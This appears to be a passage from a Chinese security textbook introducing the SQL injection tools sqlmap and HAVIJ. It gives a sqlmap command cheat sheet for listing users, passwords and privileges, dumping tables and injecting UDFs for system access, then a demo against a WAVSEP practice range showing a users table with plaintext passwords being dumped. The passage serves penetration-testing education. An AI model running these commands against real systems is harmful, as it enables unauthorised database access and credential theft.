1.sqlmap
sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,它有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。读者可以通过位于SourceForge的官方网站下载sqlmap源码(见图4-10):http://sourceforge.net/projects/sqlmap/ 。
图4-10 sqlmap界面图
也可以使用git来获取:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap常见命令:
sqlmap -u "http://url/news?Id=1" –dbms "mysql" –users # dbms 指定数据库类型 sqlmap -u "http://url/news?Id=1" –users #列数据库用户 sqlmap -u "http://url/news?Id=1" –dbs#列数据库 sqlmap -u "http://url/news?Id=1" –passwords #数据库用户密码 sqlmap -u "http://url/news?Id=1" –passwords-u root -v 0 #列出指定用户数据库密码 sqlmap -u "http://url/news?Id=1" –dump -c "password,user,id" -t "tablename"-d "db_name"–start 1 –stop 20 #列出指定字段,列出20 条 Sqlmap -u "http://url/news?Id=1" –dump-all -v 0 #列出所有数据库所有表 sqlmap -u "http://url/news?Id=1" –privileges #查看权限 sqlmap -u "http://url/news?Id=1" –privileges -u root #查看指定用户权限 sqlmap -u "http://url/news?Id=1" –is-dba -v 1 #是否是数据库管理员 sqlmap -u "http://url/news?Id=1" –roles #枚举数据库用户角色 sqlmap -u "http://url/news?Id=1" –udf-inject #导入用户自定义函数(获取 系统权限!) Sqlmap -u "http://url/news?Id=1" –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表 sqlmap -u "http://url/news?Id=1" –union-cols #union 查询表记录 sqlmap -u "http://url/news?Id=1" –cookie "cookie_value"#cookie注入 sqlmap -u "http://url/news?Id=1" -b #获取banner信息 sqlmap -u "http://url/news?Id=1" –data "id=3″#post注入 sqlmap -u "http://url/news?Id=1" -v 1 -f #指纹判别数据库类型
以WAVSEP靶场为例演示sqlmap强大功能。存在SQL注入漏洞的链接为:
http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2
其中注入点是username字段。
·获取数据库类型:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username
返回结果:
[10:45:03] [INFO] the back-end DBMS is MySQL web application technology: JSP back-end DBMS: MySQL >= 5.0 [10:45:03] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'
·获取数据库用户列表:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username --users
返回结果:
database management system users [1]: [*] 'wavsep'@'localhost' [10:51:26] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 4 times [10:51:26] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23' [*] shutting down at 10:51:26
·获取数据库列表:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username --dbs
返回结果:
[10:54:51] [INFO] fetching database names [10:54:52] [INFO] the SQL query used returns 2 entries [10:54:52] [INFO] retrieved: information_schema [10:54:52] [INFO] retrieved: wavsepDB available databases [2]: [*] information_schema [*] wavsepDB
·获取指定数据库指定表的全部数据:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username -D wavsepDB -T users --dump
返回结果:
Database: wavsepDB Table: users [7 entries] +--------+----------+------------+-----------+ | userid | username | password | privilege | +--------+----------+------------+-----------+ | 1 | user1 | password | 1 | | 2 | david | goodboy | 1 | | 3 | admin | mastermold | 5 | | 4 | user4 | password4 | 1 | | 5 | user5 | password5 | 2 | | 6 | user6 | password6 | 1 | | 7 | user7 | password7 | 1 | +--------+----------+------------+-----------+ [11:10:05] [INFO] table 'wavsepDB.users' dumped to CSV file '/Users/liu.yan/.sqlmap/output/182.61.11.23/dump/wavsepDB/users.csv' [11:10:05] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23' [*] shutting down at 11:10:05
·获取指定数据库的全部数据:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username -D wavsepDB --dump-all -v 0
返回结果:
[11:05:30] [INFO] resumed: 8 Database: wavsepDB Table: transactions [8 entries] +--------+---------------+-------+-----------------------+-----------------+ | userid | transactionId | sum | description | transactionDate | +--------+---------------+-------+-----------------------+-----------------+ | 1 | 132 | 1000 | Simple Transaction | 2010-01-01 | | 2 | 133 | 1200 | Simple Transaction | 2010-01-01 | | 3 | 135 | 3000 | Simple Transaction | 2010-01-01 | | 4 | 223 | 4000 | Simple Transaction | 2010-01-01 | | 5 | 423 | 5000 | Simple Transaction | 2010-01-01 | | 6 | 456 | 6000 | Simple Transaction | 2010-01-01 | | 7 | 789 | 7012 | Expensive Transaction | 2010-01-01 | | 8 | 895 | 8000 | Expensive Transaction | 2010-02-02 | +--------+---------------+-------+-----------------------+-----------------+ [*] shutting down at 11:05:30
2.HAVIJ
HAVIJ是一款自动化的SQL注入工具,其界面见图4-11,它能够帮助渗透测试人员发现和利用Web应用程序的SQL注入漏洞。
图4-11 HAVIJ界面图
支持的检测类型包括:
·MSSQL 2000/2005 with error;
·MSSQL 2000/2005 no-error union-based;
·MSSQL blind;
·MSSQL time-based;
·MySQL union-based;
·MySQL blind;
·MySQL error-based;
·MySQL time-based;
·Oracle union-based;
·Oracle error-based;
·Oracle blind;
·PostgreSQL union-based;
·MS Access union-based;
·MS Access blind;
·Sybase(ASE);
·Sybase(ASE)Blind。